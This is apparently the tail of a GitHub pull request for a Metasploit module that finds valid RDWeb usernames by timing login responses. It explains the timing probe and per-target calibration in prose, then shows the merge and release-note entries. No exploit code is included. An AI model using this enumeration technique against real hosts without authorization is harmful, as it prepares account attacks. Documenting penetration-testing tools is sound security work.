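Against a real host, `probe` would time the POST to `targeturi` with the candidate username and a deliberately wrong password; run the calibration once per target rather than reusing a cut-off across environments, because the invalid-user latency is set by the RDWeb host's path to its DC, not by the module.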

@bwatters-r7 bwatters-r7 merged commit 7cdd41d into rapid7:master Feb 24, 2021
@bwatters-r7
Copy link
Contributor

bwatters-r7 commented Feb 24, 2021

Release Notes

New module auxiliary/scanner/http/rdp_web_login leverages timing behavior of the web RDP authentication process to determine valid users.

@jmartin-tech jmartin-tech added the rn-modules release notes for new or majorly enhanced modules label Feb 25, 2021
This pull request was closed.
Labels
docs module needs-linting The module needs additional work to pass our automated linting rules rn-modules release notes for new or majorly enhanced modules
5 participants